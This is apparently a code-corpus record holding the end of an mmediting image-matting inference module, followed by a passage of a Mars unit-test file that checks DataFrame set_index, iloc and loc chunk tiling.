img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(merged=img, trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def fba_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def indexfg_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha'], result['pred_fg'] | 37.168831 | 97 | 0.626834 | import mmcv
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmedit.datasets.pipelines import Compose
from mmedit.models import build_model
def init_model(config, checkpoint=None, device='cuda:0'):
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
f'but got {type(config)}')
config.model.pretrained = None
config.test_cfg.metrics = None
model = build_model(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
model.cfg = config
model.to(device)
model.eval()
return model
def matting_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha']
def matting_inference_file(model, img, trimap=None, mask=None, image_path="input file directly"):
assert trimap is not None or mask is not None
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
data = dict(merged=img, mask=mask, ori_mask=mask,
trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result
def fba_inference_seg(model, img, trimap, image_path="input file directly"):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
data = dict(merged=img, trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def fba_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def indexfg_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha'], result['pred_fg'] | true | true |
1c2cb026677ecd7fe2cd08ad013b73f4da6d44cf | 34,995 | py | Python | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | 1 | 2020-11-05T05:53:00.000Z | 2020-11-05T05:53:00.000Z | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | null | null | null | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
import mars.dataframe as md
import mars.tensor as mt
from mars.tensor.core import TENSOR_CHUNK_TYPE, Tensor
from mars.tests.core import TestBase
from mars.dataframe.core import SERIES_CHUNK_TYPE, Series, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
class Test(TestBase):
def testSetIndex(self):
    """set_index('y') must drop or keep the 'y' column chunks per ``drop``."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    mdf = md.DataFrame(raw, chunk_size=2)

    # drop=True: 'y' leaves the columns, so chunk columns become ['x'] and ['z']
    dropped = mdf.set_index('y', drop=True).tiles()
    self.assertEqual(dropped.chunk_shape, (2, 2))
    pd.testing.assert_index_equal(dropped.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
    pd.testing.assert_index_equal(dropped.chunks[1].columns_value.to_pandas(), pd.Index(['z']))

    # drop=False: 'y' stays in the first column chunk alongside 'x'
    kept = mdf.set_index('y', drop=False).tiles()
    self.assertEqual(kept.chunk_shape, (2, 2))
    pd.testing.assert_index_equal(kept.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
    pd.testing.assert_index_equal(kept.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def testILocGetItem(self):
    """iloc getitem on DataFrame and Series: rejected indexer forms, then
    plain / slice / fancy indexing, checking the chunk-level shapes and
    ``op.indexes`` produced by tiling a 3x3 frame with chunk_size=2."""
    df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df2 = md.DataFrame(df1, chunk_size=2)

    # too many indexers for a 2-d frame
    with self.assertRaises(IndexingError):
        _ = df2.iloc[1, 1, 1]

    # index cannot be tuple
    with self.assertRaises(IndexingError):
        _ = df2.iloc[(1,), ]

    # index wrong type (labels are not valid for iloc)
    with self.assertRaises(TypeError):
        _ = df2.iloc['a1':]

    # a label-valued md.Series indexer is not supported
    with self.assertRaises(NotImplementedError):
        _ = df2.iloc[0, md.Series(['a2', 'a3'])]

    # fancy index should be 1-d
    with self.assertRaises(ValueError):
        _ = df2.iloc[[[0, 1], [1, 2]]]

    # Ellipsis is rejected
    with self.assertRaises(ValueError):
        _ = df2.iloc[1, ...]

    # out-of-bounds positions, negative and positive
    with self.assertRaises(IndexError):
        _ = df2.iloc[-4]

    with self.assertRaises(IndexError):
        _ = df2.iloc[3]

    # plain index: one row -> a Series split across the two column chunks
    df3 = df2.iloc[1]
    df3 = df3.tiles()
    self.assertIsInstance(df3, Series)
    self.assertIsInstance(df3.op, DataFrameIlocGetItem)
    self.assertEqual(df3.shape, (3,))
    self.assertEqual(df3.chunk_shape, (2,))
    self.assertEqual(df3.chunks[0].shape, (2,))
    self.assertEqual(df3.chunks[1].shape, (1,))
    self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
    self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
    self.assertEqual(df3.chunks[0].inputs[0].index, (0, 0))
    self.assertEqual(df3.chunks[0].inputs[0].shape, (2, 2))
    self.assertEqual(df3.chunks[1].inputs[0].index, (0, 1))
    self.assertEqual(df3.chunks[1].inputs[0].shape, (2, 1))

    # slice index: columns 2:4 touch only the second column chunk
    df4 = df2.iloc[:, 2:4]
    df4 = df4.tiles()
    self.assertIsInstance(df4, DataFrame)
    self.assertIsInstance(df4.op, DataFrameIlocGetItem)
    self.assertEqual(df4.shape, (3, 1))
    self.assertEqual(df4.chunk_shape, (2, 1))
    self.assertEqual(df4.chunks[0].shape, (2, 1))
    pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
    pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
    self.assertIsInstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
    self.assertEqual(df4.chunks[1].shape, (1, 1))
    pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
    pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
    # each output chunk must carry its own index_value key
    self.assertNotEqual(df4.chunks[0].index_value.key, df4.chunks[1].index_value.key)
    self.assertIsInstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
    self.assertEqual(df4.chunks[0].op.indexes, (slice(None, None, None), slice(None, None, None)))
    self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
    self.assertEqual(df4.chunks[0].inputs[0].index, (0, 1))
    self.assertEqual(df4.chunks[0].inputs[0].shape, (2, 1))
    self.assertEqual(df4.chunks[1].inputs[0].index, (1, 1))
    self.assertEqual(df4.chunks[1].inputs[0].shape, (1, 1))

    # plain fancy index: one row, all columns -> two chunks on axis 1
    df5 = df2.iloc[[0], [0, 1, 2]]
    df5 = df5.tiles()
    self.assertIsInstance(df5, DataFrame)
    self.assertIsInstance(df5.op, DataFrameIlocGetItem)
    self.assertEqual(df5.shape, (1, 3))
    self.assertEqual(df5.chunk_shape, (1, 2))
    self.assertEqual(df5.chunks[0].shape, (1, 2))
    pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
    pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
    self.assertIsInstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
    self.assertEqual(df5.chunks[1].shape, (1, 1))
    pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
    pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
    self.assertIsInstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
    # fancy positions are rewritten into per-chunk local positions
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
    self.assertEqual(df5.chunks[0].inputs[0].index, (0, 0))
    self.assertEqual(df5.chunks[0].inputs[0].shape, (2, 2))
    self.assertEqual(df5.chunks[1].inputs[0].index, (0, 1))
    self.assertEqual(df5.chunks[1].inputs[0].shape, (2, 1))

    # fancy index spanning both row chunks -> 2x2 output chunk grid
    df6 = df2.iloc[[1, 2], [0, 1, 2]]
    df6 = df6.tiles()
    self.assertIsInstance(df6, DataFrame)
    self.assertIsInstance(df6.op, DataFrameIlocGetItem)
    self.assertEqual(df6.shape, (2, 3))
    self.assertEqual(df6.chunk_shape, (2, 2))
    self.assertEqual(df6.chunks[0].shape, (1, 2))
    self.assertEqual(df6.chunks[1].shape, (1, 1))
    self.assertEqual(df6.chunks[2].shape, (1, 2))
    self.assertEqual(df6.chunks[3].shape, (1, 1))
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
    self.assertEqual(df6.chunks[0].inputs[0].index, (0, 0))
    self.assertEqual(df6.chunks[0].inputs[0].shape, (2, 2))
    self.assertEqual(df6.chunks[1].inputs[0].index, (0, 1))
    self.assertEqual(df6.chunks[1].inputs[0].shape, (2, 1))
    self.assertEqual(df6.chunks[2].inputs[0].index, (1, 0))
    self.assertEqual(df6.chunks[2].inputs[0].shape, (1, 2))
    self.assertEqual(df6.chunks[3].inputs[0].index, (1, 1))
    self.assertEqual(df6.chunks[3].inputs[0].shape, (1, 1))

    # plain scalar index (row, col) -> 0-d tensor
    df7 = df2.iloc[1, 2]
    df7 = df7.tiles()
    self.assertIsInstance(df7, Tensor)  # scalar
    self.assertIsInstance(df7.op, DataFrameIlocGetItem)
    self.assertEqual(df7.shape, ())
    self.assertEqual(df7.chunk_shape, ())
    self.assertEqual(df7.chunks[0].dtype, df7.dtype)
    self.assertEqual(df7.chunks[0].shape, ())
    self.assertEqual(df7.chunks[0].op.indexes, (1, 0))
    self.assertEqual(df7.chunks[0].inputs[0].index, (0, 1))
    self.assertEqual(df7.chunks[0].inputs[0].shape, (2, 1))

    # test Series iloc getitem
    # slice 4:8 over chunk_size=3 hits the middle two chunks
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
    series = series.tiles()
    self.assertEqual(series.shape, (4,))
    self.assertEqual(len(series.chunks), 2)
    self.assertEqual(series.chunks[0].shape, (2,))
    self.assertEqual(series.chunks[0].index, (0,))
    self.assertEqual(series.chunks[0].op.indexes, (slice(1, 3, 1),))
    self.assertEqual(series.chunks[1].shape, (2,))
    self.assertEqual(series.chunks[1].op.indexes, (slice(0, 2, 1),))
    self.assertEqual(series.chunks[1].index, (1,))

    # fancy index: one output chunk per input chunk that is hit
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
    series = series.tiles()
    self.assertEqual(series.shape, (3,))
    self.assertEqual(len(series.chunks), 3)
    self.assertEqual(series.chunks[0].shape, (1,))
    self.assertEqual(series.chunks[0].index, (0,))
    self.assertEqual(series.chunks[0].op.indexes[0], [2])
    self.assertEqual(series.chunks[1].shape, (1,))
    self.assertEqual(series.chunks[1].op.indexes[0], [1])
    self.assertEqual(series.chunks[1].index, (1,))
    self.assertEqual(series.chunks[2].shape, (1,))
    self.assertEqual(series.chunks[2].op.indexes[0], [2])
    self.assertEqual(series.chunks[2].index, (2,))
def testILocSetItem(self):
    """iloc setitem: each assignment produces a DataFrameIlocSetItem graph whose
    tiled chunks keep the source chunk layout; only chunks touched by the
    indexer get an IlocSetItem op, the rest pass through unchanged (same key)."""
    df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df2 = md.DataFrame(df1, chunk_size=2)
    df2 = df2.tiles()  # reference tiling to compare layouts against

    # plain index
    df3 = md.DataFrame(df1, chunk_size=2)
    df3.iloc[1] = 100
    df3 = df3.tiles()
    self.assertIsInstance(df3.op, DataFrameIlocSetItem)
    self.assertEqual(df3.chunk_shape, df2.chunk_shape)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df3.index_value.to_pandas())
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df3.columns_value.to_pandas())
    for c1, c2 in zip(df2.chunks, df3.chunks):
        self.assertEqual(c1.shape, c2.shape)
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            # modified chunk: its input is the corresponding source chunk
            self.assertEqual(c1.key, c2.inputs[0].key)
        else:
            # untouched chunk is reused as-is
            self.assertEqual(c1.key, c2.key)
    self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
    self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))

    # slice index
    df4 = md.DataFrame(df1, chunk_size=2)
    df4.iloc[:, 2:4] = 1111
    df4 = df4.tiles()
    self.assertIsInstance(df4.op, DataFrameIlocSetItem)
    self.assertEqual(df4.chunk_shape, df2.chunk_shape)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df4.index_value.to_pandas())
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df4.columns_value.to_pandas())
    for c1, c2 in zip(df2.chunks, df4.chunks):
        self.assertEqual(c1.shape, c2.shape)
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            self.assertEqual(c1.key, c2.inputs[0].key)
        else:
            self.assertEqual(c1.key, c2.key)
    # only the second column chunk (indexes 1 and 3) is rewritten
    self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
    self.assertEqual(df4.chunks[3].op.indexes, (slice(None, None, None), slice(None, None, None)))

    # plain fancy index
    df5 = md.DataFrame(df1, chunk_size=2)
    df5.iloc[[0], [0, 1, 2]] = 2222
    df5 = df5.tiles()
    self.assertIsInstance(df5.op, DataFrameIlocSetItem)
    self.assertEqual(df5.chunk_shape, df2.chunk_shape)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df5.index_value.to_pandas())
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df5.columns_value.to_pandas())
    for c1, c2 in zip(df2.chunks, df5.chunks):
        self.assertEqual(c1.shape, c2.shape)
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            self.assertEqual(c1.key, c2.inputs[0].key)
        else:
            self.assertEqual(c1.key, c2.key)
    # global fancy positions are translated to chunk-local positions
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])

    # fancy index touching all four chunks
    df6 = md.DataFrame(df1, chunk_size=2)
    df6.iloc[[1, 2], [0, 1, 2]] = 3333
    df6 = df6.tiles()
    self.assertIsInstance(df6.op, DataFrameIlocSetItem)
    self.assertEqual(df6.chunk_shape, df2.chunk_shape)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df6.index_value.to_pandas())
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df6.columns_value.to_pandas())
    for c1, c2 in zip(df2.chunks, df6.chunks):
        self.assertEqual(c1.shape, c2.shape)
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            self.assertEqual(c1.key, c2.inputs[0].key)
        else:
            self.assertEqual(c1.key, c2.key)
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])

    # plain scalar index: only chunk (0, 1) is rewritten
    df7 = md.DataFrame(df1, chunk_size=2)
    df7.iloc[1, 2] = 4444
    df7 = df7.tiles()
    self.assertIsInstance(df7.op, DataFrameIlocSetItem)
    self.assertEqual(df7.chunk_shape, df2.chunk_shape)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df7.index_value.to_pandas())
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df7.columns_value.to_pandas())
    for c1, c2 in zip(df2.chunks, df7.chunks):
        self.assertEqual(c1.shape, c2.shape)
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            self.assertEqual(c1.key, c2.inputs[0].key)
        else:
            self.assertEqual(c1.key, c2.key)
    self.assertEqual(df7.chunks[1].op.indexes, (1, 0))

    # test Series
    # slice assignment spans the first two chunks
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
    series.iloc[:4] = 2
    series = series.tiles()
    self.assertEqual(series.shape, (10,))
    self.assertEqual(len(series.chunks), 4)
    self.assertEqual(series.chunks[0].op.indexes, [slice(None, None, None), ])
    self.assertEqual(series.chunks[0].op.value, 2)
    self.assertEqual(series.chunks[1].op.indexes, [slice(0, 1, 1), ])
    self.assertEqual(series.chunks[1].op.value, 2)

    # fancy index assignment: positions mapped into chunks 0, 1 and 3
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
    series.iloc[[2, 4, 9]] = 3
    series = series.tiles()
    self.assertEqual(series.shape, (10,))
    self.assertEqual(len(series.chunks), 4)
    self.assertEqual(series.chunks[0].index, (0,))
    self.assertEqual(series.chunks[0].op.indexes[0].tolist(), [2])
    self.assertEqual(series.chunks[0].op.value, 3)
    self.assertEqual(series.chunks[1].index, (1,))
    self.assertEqual(series.chunks[1].op.indexes[0].tolist(), [1])
    self.assertEqual(series.chunks[1].op.value, 3)
    self.assertEqual(series.chunks[3].index, (3,))
    self.assertEqual(series.chunks[3].op.indexes[0].tolist(), [0])
    self.assertEqual(series.chunks[3].op.value, 3)
def testDataFrameLoc(self):
    """loc getitem on DataFrame/Series: scalar, axis-wise Series results,
    slices, boolean/fancy indexers (including md.Series indexers), and the
    metadata (shape, index/columns values, dtypes) they propagate."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df = md.DataFrame(raw, chunk_size=2)
    raw2 = raw.copy()
    raw2.reset_index(inplace=True, drop=True)  # same data, RangeIndex
    df3 = md.DataFrame(raw2, chunk_size=2)
    s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
    series = md.Series(s, chunk_size=2)

    # test return scalar
    df2 = df.loc['a1', 'z']
    self.assertIsInstance(df2, Tensor)
    self.assertEqual(df2.shape, ())
    self.assertEqual(df2.dtype, raw['z'].dtype)

    df2 = df2.tiles()
    self.assertEqual(len(df2.chunks), 1)
    self.assertIsInstance(df2.chunks[0], TENSOR_CHUNK_TYPE)

    # test return series for index axis
    df2 = df.loc[:, 'y']
    self.assertIsInstance(df2, Series)
    self.assertEqual(df2.shape, (3,))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertEqual(df2.name, 'y')

    df2 = df2.tiles()
    self.assertEqual(len(df2.chunks), 2)
    for c in df2.chunks:
        self.assertIsInstance(c, SERIES_CHUNK_TYPE)
        self.assertIsInstance(c.index_value.to_pandas(), type(raw.index))
        self.assertEqual(c.name, 'y')
        self.assertEqual(c.dtype, raw['y'].dtype)

    # test return series for column axis: row selection -> name is the label
    df2 = df.loc['a2', :]
    self.assertIsInstance(df2, Series)
    self.assertEqual(df2.shape, (3,))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
    self.assertEqual(df2.name, 'a2')

    df2 = df2.tiles()
    self.assertEqual(len(df2.chunks), 2)
    for c in df2.chunks:
        self.assertIsInstance(c, SERIES_CHUNK_TYPE)
        self.assertIsInstance(c.index_value.to_pandas(), type(raw.columns))
        self.assertEqual(c.name, 'a2')
        self.assertEqual(c.dtype, raw.loc['a2'].dtype)

    # test slice: label slice length is unknown before execution -> nan rows
    df2 = df.loc['a2': 'a3', 'y': 'z']
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (np.nan, 2))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertNotEqual(df2.index_value.key, df.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)

    # test fancy index on index axis
    df2 = df.loc[['a3', 'a2'], [True, False, True]]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (2, 2))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertNotEqual(df2.index_value.key, df.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, [True, False, True]].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)

